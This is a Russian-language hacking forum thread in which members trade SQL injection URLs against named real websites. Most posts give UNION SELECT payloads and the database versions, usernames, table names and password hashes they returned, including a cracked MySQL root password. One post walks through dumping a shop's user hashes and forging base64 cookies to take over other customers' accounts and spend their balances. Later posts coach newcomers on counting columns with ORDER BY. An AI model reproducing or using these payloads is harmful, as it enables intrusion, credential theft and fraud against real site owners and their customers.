Сообщений в теме: 96

[AFoST]

]]>http://www.mw.org.pl...5,16,17,18,19/*]]>

[4yB@K]

]]>http://www.siberia-k...ers limit 1,1/*]]>
В общем читаем инфу с таблиц форума, через скулю в портале :-P

[$iD]

http://www.tsn.ca/news_story.asp?ID=1+or+1=(select+top+1+table_name+from+information_schema.
tables)--
http://www.vbn.ru/frameshow.asp?id=1+or+1=@@version--
http://www.vbn.ru/frameshow.asp?id=1+or+1=(select+top+1+table_name+from+information_schema.
tables)--

[AFoST]

]]>http://www.astrotur....)) from news /*]]>

[ENFIX]

Магазин эротичного белья Shirley.RU
Сама скуль:

http://shirley.ru/cat.php?id=3+and+1=0+union+select+1,2/*

Узнаем версию и юзверя:

http://shirley.ru/cat.php?id=3+and+1=0+union+select+concat_ws(0x3a,user(),version()),2/*

shir@localhost:5.0.33
Узнаем имена таблиц:

http://shirley.ru/cat.php?id=3+and+1=0+union+select+table_name,2+from+INFORMATION_SCHEMA.tables+
limit+16,1/*

Интересные:
shir_balance  
shir_cart_orders  
shir_cart_orderitems  
shir_cart_prod_assort  
shir_opt_users  
shir_session  
shir_users
shir_users_new  
Узнаем имена столбцов:

http://shirley.ru/cat.php?id=3+and+1=0+union+select+concat_ws(0x3a,table_name,column_name),2+from+
INFORMATION_SCHEMA.columns+where+table_name=0x736869725F7573657273+limit+0,1/*

Интересное:
uid
uname
pass
email
Выводим uid,uname,pass

http://shirley.ru/cat.php?id=3+and+1=0+union+select+concat_ws(0x3a,uid,uname,pass),2+from+
shir_users+limit+0,1/*

получаем идент:логин:мд5хэш
Регаемся:

http://shirley.ru/user.php?name=new_user

Заходим в свой акк, смотрим куки (они зашифрованы в base64). Декодируем и получаем идент:логин:md5хэш
дэкодируем и вставляем чужие данные. Обновляем страницу и смотрим, что мы под дргим акком
На многих акках есть баланс, при чем крупненький ;)
благодаря таблице shir_balance можно вывести балан и номер пользователя, а дальше сами думаем ;)
В общем заходим под акком и покупаем себе эротическое белье ;)

[AFoST]

]]>http://www.dot2007.d...rsion()),9,10/*]]>
]]>http://www.arqtipo.c...,10,11,12,13 /*]]>

[MoLoToK]

http://fckhimki.ru/modules/news/index.php?current_id=999999+union+select+1,2,3,4,5,6,7,8,9,10,11,
12,13/*

Версия 4.0.27-max-log

[MoLoToK]

http://www.llatalent.com/current/index.php?current_id=999999+union+select+1,2,3,4,5,6,7,8,9,10,11,
12,13,14,15,16,17,18/*

версия: 4.0.27-standard
user:dbm.llatalent.com@web189.megawebservers.com

[AFoST]

]]>http://www.vaal.ru/s...6,7,8,9,10,11/*]]>

[MoLoToK]

http://www.m-logos.ru/seminars/info.phtml?id=-1+union+select+1,2,3,4,version(),user(),7,8,9,
database(),11,12,13,14,15,16,17,18,19,20/*

[MoLoToK]

http://www.psychasoc.com/print_news.php?ID=-1+union+select+version(),2,3,4,user()/*

4.0.27-log/psychasoc@192.168.3.5/psychasoc
таблицы admin
news
phorum_users
users
колонки login
password

http://www.vineargenti.com/eng/print_news.php?id=-1+union+select+1,2,3,version(),
5,6,7,8,9/*

user: oc/o@/giul - 5
version: ta/3-/4.1. - 5

http://speleogenesis.info/pubalert/show_details.php?PubID=-1+union+select+1,user(),version(),
4,5,6,7,8,9,10,11/*

4.0.25-standard
speleo3_datauser@localhost

[MoLoToK]

Megashara

http://megashara.com/item.php?tid=-1'%20union%20select%201,2,3,4,5,6,7,8,user,10,11,12,13,14,15,16,17,18,19,20,21,22,password,24,25,26,27,28,29,30,31,32,33
,34,35,36,37,38%20from%20mysql.user/*

Таблица mysql.user Доступна
root:*111921C1B9EE2D4BD4C825031689DCD63239883F
После расшифровки root: ghjcnjgfhjkm

Админку не нашёл.
З.Ы странно после нахождения скули сайт глючить стал

[$iD]

SQL в WM-аукционе ;)

Скрытый текст

http://wmauction.org.ru/shop.php?go=wins&v=WM'%20UNION%20SELECT%201,2,3,4,5/*

[MoLoToK]

http://pornoshara.com/item.php?tid=-1'+union+select+1,2,3,4,5,6,7,8,password,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+
from+mysql.user/*

[MoLoToK]

http://www.heroesworld.ru/files.php?section=9999999'+union+select+1,concat_ws(0x2F,user(),
version()%20%20,database())/*

heroesv_bdu@localhost/4.1.20/heroesv_main
Работает только с 9999999.

[ENFIX]

>Работает только с 9999999.
Да не... будет работать и так:

http://www.heroesworld.ru/files.php?section=408'+and+1=0+union+select+1,concat_ws(0x2F,user(),
version(),database())/*

и так:

http://www.heroesworld.ru/files.php?section=408'+limit+0+union+select+1,concat_ws(0x2F,user(),
version(),database())/*

;)

[MoLoToK]

2 Enfix спс, не знал))
-------------------------

Ultimate Frisbee

http://www.ultimate.com.ua/ru/?g=manual&id=-1+union+select+1,2,3,4,5,version()/*

5.0.27-log

http://www.ultimate.com.ua/ru/?g=manual&id=-1+union+select+1,2,3,4,5,
Table_name+from+information_schema.tables/*

есть доступ к information_schema.tables

интересные таблицы
admins
news
ULTM_players
players

[Xeromant]

The used SELECT statements have a different number of columns

Кто знает что это? и как с этим боротся?

[MoLoToK]

Это значит что ты не правильно подобрал столбцы например вместо

http://www.ultimate.com.ua/ru/?g=manual&id=-1+union+select+1,2,3,4,5,
Table_name+from+information_schema.tables/*

написать

http://www.ultimate.com.ua/ru/?g=manual&id=-1+union+select+1,2,3,4,
Table_name+from+information_schema.tables/*

Выдаст тоже самое.
Чтобы этого избежать нужно использовать функию order+by
Пример

http://www.ultimate.com.ua/ru/?g=manual&id=-1+order+by+10/*

Выдаёт ошибку Unknown column '10' in 'order clause'. Это значит что столбцов меньше 10.

http://www.ultimate.com.ua/ru/?g=manual&id=-1+order+by+3/*

Ничего не выдаёт это значит что столцов или 3 или больше.
Также можно использовать group by

[Xeromant]

DIKIY
Спасибо. Терь все гуд

[Xeromant]

SELECT command denied to user 'sddcom_tram'@'localhost' for table 'users' а это че за хрень?

[AFoST]

Для юзера 'sddcom_tram'@'localhost' нет правд доступа к просмотру таблицы 'users'

[Xeromant]

ТОесть больше чем информацию о таблицах посмотреть нельзя?

[MoLoToK]

данная таблица не доcтупна, поэтому нужно искать другие таблицы типа news, admins,mysql.user

[Xeromant]

DIKIY
Может стукнишь ко мне в аську. там и поговорим